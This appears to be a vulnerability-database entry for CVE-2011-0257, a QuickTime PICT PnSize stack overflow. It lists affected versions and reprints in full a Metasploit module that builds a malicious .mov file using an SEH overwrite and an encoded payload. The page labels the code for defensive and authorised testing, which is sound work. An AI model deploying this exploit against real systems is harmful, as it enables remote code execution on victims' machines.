CVE-2011-0257

Severity: critical
Published 2011-08-15 · Modified 2026-04-29
CVSS v3: —
CVSS v4: — (not yet in upstream)
VIR risk: 10.0

Description

Integer signedness error in Apple QuickTime before 7.7 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PnSize opcode in a PICT file that triggers a stack-based buffer overflow.

Predictions

Exploit likelihood: 20%
Patch ETA: —

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-17777 · local · windows · verified · ruby · 2 KB
Metasploit · 2011-09-03

Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)

Ruby exploit · Source: Exploit-DB
##
# $Id: apple_quicktime_pnsize.rb 13691 2011-09-03 21:17:58Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple QuickTime PICT PnSize Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
					When opening a .mov file containing a specially crafted PnSize value, an attacker
					may be able to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 13691 $',
			'References'     =>
				[
					[ 'CVE', '2011-0257' ],
					[ 'BID', '49144' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "",
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
					'DisableNops'  =>  'True',
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
						},
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP3', { 'Ret' => 0x672b6d4a } ], # QuickTime.qts 7.60.92.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 8 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
			], self.class)
	end

	def exploit

		trigger = rand_text_alpha_upper(3324)
		trigger[2302, 8]  = generate_seh_record(target.ret)
		trigger[2310, payload.encoded.size] = payload.encoded

		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
		fd = File.open(path, "rb" )
		sploit = fd.read(fd.stat.size)
		fd.close

		sploit << trigger

		file_create(sploit)
	end
end
__END__
http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt

Opcode   Name                       Description                  Data Size (in bytes)

$0007    PnSize                     pen size (point)             4

Metasploit modules

Apple QuickTime PICT PnSize Buffer Overflow

Application impact

Platform  Vendor  Product    Versions                          Fixed

macos     apple   quicktime  <= 7.6.9 (endIncluding "7.6.9")   (none listed)
macos     apple   quicktime  7.0.0                             (none listed)
macos     apple   quicktime  7.0.1                             (none listed)
macos     apple   quicktime  7.0.2                             (none listed)
macos     apple   quicktime  7.0.3                             (none listed)
macos     apple   quicktime  7.0.4                             (none listed)
macos     apple   quicktime  7.1.0                             (none listed)
macos     apple   quicktime  7.1.1                             (none listed)
macos     apple   quicktime  7.1.2                             (none listed)
macos     apple   quicktime  7.1.3                             (none listed)
macos     apple   quicktime  7.1.4                             (none listed)
macos     apple   quicktime  7.1.5                             (none listed)
macos     apple   quicktime  7.1.6                             (none listed)
macos     apple   quicktime  7.2.0                             (none listed)
macos     apple   quicktime  7.2.1                             (none listed)
macos     apple   quicktime  7.3.0                             (none listed)
macos     apple   quicktime  7.3.1                             (none listed)
macos     apple   quicktime  7.3.1.70                          (none listed)
macos     apple   quicktime  7.4.0                             (none listed)
macos     apple   quicktime  7.4.1                             (none listed)
macos     apple   quicktime  7.4.5                             (none listed)
macos     apple   quicktime  7.5.0                             (none listed)
macos     apple   quicktime  7.5.5                             (none listed)
macos     apple   quicktime  7.6.0                             (none listed)
macos     apple   quicktime  7.6.1                             (none listed)
macos     apple   quicktime  7.6.2                             (none listed)
macos     apple   quicktime  7.6.5                             (none listed)
macos     apple   quicktime  7.6.6                             (none listed)
macos     apple   quicktime  7.6.7                             (none listed)
macos     apple   quicktime  7.6.8                             (none listed)
macos     apple   quicktime  7.66.71.0                         (none listed)
macos     apple   quicktime  7.67.75.0                         (none listed)

References

CWEs

CWE-189